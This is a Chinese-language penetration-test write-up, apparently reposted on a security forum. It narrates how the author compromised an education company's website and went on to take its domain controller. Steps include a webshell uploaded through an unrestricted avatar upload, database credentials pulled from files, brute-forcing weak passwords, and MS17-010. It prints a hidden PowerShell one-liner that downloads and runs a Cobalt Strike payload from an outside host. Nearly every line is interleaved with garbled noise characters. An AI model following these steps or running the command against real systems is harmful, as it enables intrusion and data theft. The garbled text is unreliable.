! T/ j6 F6 k1 L( e 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
- P( |5 H9 I5 E! z( @% J* m4 K# ]# _* y! \2 ` ; u9 \. s/ E( G" A% J' X5 y
5 P g* V7 M; N: h$ @正文
& r ~' ]: l/ O$ k0 V F4 A* Q$ S* w0 s4 Z9 c5 L/ U3 h
' l, f4 |; n( d' n! _
目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能8 a/ j2 T- `5 }' Q
进行了简单的信息搜集
/ b* w9 {& ]6 t7 m/ `
$ x \- C* m8 b1 `" k9 r3 X0 g" q( t3 L
子域名搜集
* M8 u f% v! `; F8 Z& c5 t3 M. d6 M
fofa找资产
" a; s& H& J4 x$ ^8 M3 o1 x
5 j6 O; X( ^+ t* [( y. O. W; i7 ~
一共七个资产。去重之后只有两个。
6 h& X7 |, \5 W% m& j
目录探测4 v! a: O5 H- L; |3 _3 [
. X) P- \( n1 f$ F' g+ U" g
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 O# X0 r% V3 l7 q V4 f8 w4 H/ |
我又尝试了通过修改返回包来绕过登录界面
. |6 K! ]% s* E. u' X& r
还是不行,尝试注入无果4 ^8 | H9 p7 W; z: U K
6 l. s& q, Z6 F7 B1 T* m. e) h5 b. f" d9 L) F
8 L* B' ~# D3 O
; `% r0 _6 {' S, k, B3 y
不过我目录探测出了一处Spring信息泄露
- q- |/ A- J: r2 ?) |
0 s+ p& \% ]$ X0 X0 S R; o+ r+ G
4 U0 B) O% p8 w+ ~ n- ?
F) | p, ?9 H& A8 }
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
8 a3 _# h" B; M% [# t8 T, G" V6 K
8 {1 j9 V3 u. v# @9 I6 g 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
+ c( M5 L/ G1 Q6 u8 |) W
8 @& k! |2 X+ [0 D' ~4 r9 b# D
3 O7 l4 C3 ]& C/ s2 l, D7 p 获取有些师傅到这一步就手机抓包电脑测了。( R; P) E6 D% L1 }! P
" U; [5 P: Z, z7 O Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
其中在一个公众号发现了小程序,可以进行注册。0 m/ B: i. h3 u8 `- i1 @$ k
9 t7 k) Z9 d; E$ s- ^/ z看到了头像上传,尝试上传获取WebShell
" A8 r1 H8 k0 O5 {
1 i( ~5 q3 [& X6 v. D
, ? h1 k8 Y7 |" V/ x" G4 k 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问8 a0 q3 O9 A$ `( Y
. r. [6 z, q2 Y: D5 C! O2 w: j8 {2 F
' e) f& t Z6 p* C6 K) L' A1 c 然后上了大马
( U3 G, S8 J" T6 Q. E. P0 D
! V/ r4 }( U- i/ c
, M1 T" h2 V6 r; ^3 p4 V6 ^$ J' u
) a1 X( \4 a* f$ X; C. o% ?: m$ l( a
通过翻找文件发现数据库账号密码
) u1 b! a* s# G) E0 B+ w! Q# m% u& \7 e2 f6 s- c' i
! v7 {& Y% q2 g3 I: a --内网渗透( n/ l# C5 I4 T8 {
/ ^9 o- L7 m' i& d2 ~3 g( r H; C 直接通过powershell执行 cs上线
7 F7 {0 [8 |$ L2 N$ g9 X0 _ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"5 V4 x/ n8 d% Z* H8 Y
/ z* T9 k9 d, d- }$ q4 z" o: _
& a7 s) c. T6 _7 [
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
! C( T% _+ A F- H8 t0 ~7 G) p
' z& N8 B7 G) |. s# R
3 e# V. |" |( x5 `# u' ~
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, R+ p, V8 k1 [) f" g3 t# s n
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 U1 z. Y, G: i! q |5 o
3 J3 u: ]3 x2 l. n
* X1 ?! s K6 X2 i6 Q* O
/ S% p' z) \5 P" ?- y- f9 V0 \
* ~' o* q8 h0 |$ ]$ @, g
' b1 `7 e: t6 c; k7 g
; o- \0 c9 d; u/ R% D5 V
. i. `( X) w# z3 i: ?) ]1 I; u+ ^
小结
8 C+ g9 D4 m" r% F6 J 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
+ @5 _6 ?' O6 N& V) v, P3 g
: [9 f. Y: ^0 W3 t# L! B$ }! j. I }& S4 c: t% j 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |